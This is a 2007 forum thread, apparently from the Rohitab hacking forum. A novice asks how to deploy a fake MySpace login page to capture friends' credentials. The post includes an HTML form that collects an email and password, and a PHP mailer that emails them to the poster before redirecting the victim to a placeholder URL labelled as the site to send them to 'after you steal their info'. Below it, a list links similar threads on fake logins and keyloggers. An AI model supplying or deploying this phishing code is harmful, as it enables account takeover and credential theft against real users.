zabbix
Results 1 to 2 of 2

Thread: Fake login

Threaded View

  1. #1
    Join Date
    Mar 2007
    Posts
    3

    Fake login

    Whatz up to all the people in Rohittab,
    Noob here please go light, I have a situation here that I'm trying to work out.. to cut to the chase I want to make a fake login myspace for self education on how it's done and also to mess with friends that have myspace.. I have a good understandings in HTML and very little with PHP.. theres two codes that I have found through out the researching I have been doing in Rohitab/search form ( I will put them up down below) in the PHP codes I see that theres a couple of blanks that has to be filled out / email,the subject and locations, now for the ones that have the $post blank and $post blank what goes in there? once I'm done filling the blanks out were exactly do I put the PHP code and blank HTML in the myspace codes....Please help me it's driving me up the wall....



    <form method="POST" action="mailer.php">
    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    E-mail<input type="text" name="email" size="**"><br>
    <br>
    Password<input type="password" name="message" size="**"><br>
    <br>
    &nbsp;<br>
    <br>
    <input type="Submit" value="Submit" name="Submit">
    </form>





    <?php
    if(isset($_POST['submit'])) {

    $to = "YOUR_EMAIL_HERE@SOMETHING.COM";
    $subject = "THE SUBJECT HERE!";
    $email_field = $_POST['email'];
    $message = $_POST['message'];

    $body = " E-Mail: $email_field\n Password:\n $message";

    mail($to, $subject, $body);

    header("Location: http://www.THE_SITE_YOU_WANT_THEM_DIRECTED_TO_AFTER_YOU_STEAL_THEIR_INFO.com/");

    } else {

    header("Location: http://www.THE_SITE_YOU_WANT_THEM_DIRECTED_TO_AFTER_YOU_STEAL_THEIR_INFO.com/");

    }
    ?>
    Last edited by b52_00; 03-26-2007 at 02:40 PM.

Similar Threads

  1. Fake login
    By shizzle08 in forum Internet Privacy
    Replies: 1
    Last Post: 02-28-2009, 12:50 PM
  2. My fake login page
    By jeffrey_978 in forum Programming
    Replies: 19
    Last Post: 01-14-2008, 04:12 PM
  3. fake myspace login help
    By lonegunner46 in forum Programming
    Replies: 24
    Last Post: 06-11-2007, 03:01 AM
  4. my first fake login page
    By trickytap in forum Internet Privacy
    Replies: 8
    Last Post: 05-01-2007, 03:19 PM
  5. need help with keylogger/fake login
    By kusiobache in forum Viruses and Trojans
    Replies: 1
    Last Post: 04-17-2007, 05:43 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts